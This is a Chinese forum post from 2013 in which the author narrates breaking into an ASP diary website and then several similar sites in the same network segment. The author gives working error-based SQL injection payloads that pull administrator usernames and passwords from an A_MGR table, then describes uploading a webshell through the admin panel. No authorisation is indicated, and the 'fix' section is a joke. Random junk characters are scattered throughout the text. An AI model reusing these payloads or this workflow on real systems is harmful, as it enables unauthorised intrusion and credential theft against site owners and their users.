发现一个注入点2 b7 \$ B" |5 ]9 \
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389% I- X9 | Q6 r0 g! d1 q4 Q
' D- N0 {+ j0 j' p' o" J/ v习惯性的加’having1=1--
! H# p4 E% P3 C
6 u( }3 p0 b V, `- [/ m. W$ F( ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—9 w! |1 C( K* U. L% T
0 b$ l# t- y2 c [9 i0
" r* s* k1 E- b, U! {+ w& A5 W% a/ X9 f( D6 R9 |7 [
爆出Diary_A.dl_Title(这时候很激动啊)
% ]2 `9 O7 h. o; J S X4 @1 v# J9 t' I4 u/ T" ^5 r
那么继续
$ C O, N5 l( |7 qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
) ~+ m5 g# Q0 U% Z5 L& X& c* |/ X, }& D
继续,一直爆下去
$ H7 z' I r5 X8 c# p n( m% m, h: }# l3 f" |. f. R& a
爆到几个字段和表段 但是没找到需要的管理用户的字段
6 Q1 D: |* ~" n: ^! I# }! H/ d0 g
蛋疼了 怎么办 然后去后台登陆页看源码
* } ~3 W+ b( \) j" n" L; D7 l# F( k# U# Y: l; p: L4 J
04 A" e' L4 k- s4 }
4 v! l+ J5 @# @) |Input name= “ADUID”: k1 m& ?% R. U) o0 x
Input name= “ADPWD”8 P9 s, q9 A0 w' G! I
: f. e: I8 z; A" r
很幸运 找到了字段那就继续/ j% `9 n5 R+ w y
找到之后开始爆用户# x; S# C' u$ }( Z- y- _' E& @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—. Y" P& v- g' V
爆密码
2 ^2 M% A6 S [& A+ @http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—0 A u9 E: B6 Q2 S9 O; r
测试了下 这个注入点只能爆到文章哪里的表 / ~& R5 Z6 ~* N& A; Z
. w- ^8 E: F- L' D0 a) K3 x头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
5 U, @1 S) f5 t* ^; @6 J$ H3 R: f1 B; D$ T5 C* d1 [# {: F
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了- F; E# b. _3 ` H8 y" H& P
+ @1 ? _/ \. U473
7 {* V1 l' t# o( c! s8 @; B
" I+ u7 m, S" S- I+ D进后台$ u9 [3 g o4 o3 \, z/ \
H" L4 y1 L' e# [3 f+ P1 ]/ X
6 }0 g4 n Y' ^" g7 c0 d
发现几个上传点 有的地方不能上传 而且防止恶意代码+ g' v# q. \8 @* S
0 C4 f) d* I) s& b# S0 z8 }) Q6 E没办法 各种百度各种找大牛 找到一只好像可以突破的马& Q5 T% n) c! D- |" R. r! M
' i1 Q/ Z& s, m) L! Q, [
1 F- a: q4 Y/ M! I# f& M& w, j在系统管理那里直接上传 不过没有显示地址
- i4 p; Z+ d4 A d% s9 I( j m7 J
再上传一次 抓包 搞定OK
+ u3 ~7 q* K. h* N
# P1 R; J" @% C: p% }1 y8 N3 m! r5 l, ]9 w0 I; r
$ n+ Y% c4 q# y0 Y' X3 ^9 A) a7 Z; }8 b2 {
472
6 w# n' J& R1 ~! `/ i+ b+ ]7 N2 R8 o1 I
晚上不行了 去睡觉。。。& G& [/ B. X2 j2 w( B
第二天刚起床 闲的没事做继续日站吧
$ z0 T' K8 B( c! N6 o4 K, ~! q0 v1 \5 J' b6 N
找个站 就把这个站的旁c扫了下0 L: G0 R5 z+ e- k1 c- U/ @" R
0 r6 _& z* v6 f7 k5 \* P发现c段也有一个购物站 ,然后还和这个站的模板差不多: }& I( Z# ~, s# @
1 @ m/ s. a. f: R5 P. C+ q {, u
就找到会员登录口测试
% K- b4 _/ r% c, v' O1 P5 W7 g0 I( T4 M y" @5 D" O- `# j
'and (select top 1 MGR_UID from A_MGR)>0—
* K2 y) u& W. W. }# c8 t果断爆到了 这时候我很激动 通杀3 }) `) S- Y4 H3 t5 ?
: @9 m2 L# c% R Z( n" J; I; W
再次翻c段" o% c* m7 p/ S/ }0 k y/ f0 s
6 `) T% e. c7 _: _3 l翻出几个站 都成功拿下
* ?. o4 E# _" ~ |" W3 ^6 x4 w8 J. n9 \5 }# N
1 |, s+ P% s7 r, d8 L, l: |2 z( f0 d
" |% h2 `& u2 P* c' n% n
修复方案:
; h! L. G; X5 v+ e他们比我专业
7 l: [8 t2 h5 t4 n- O
2 n( F+ _+ z8 {8 c& G, ^1 G- k5 x, C0 \0 B
% J% O" |$ Q8 j" t; G' L |
发表于 2013-4-4 17:40:38
收藏
支持
反对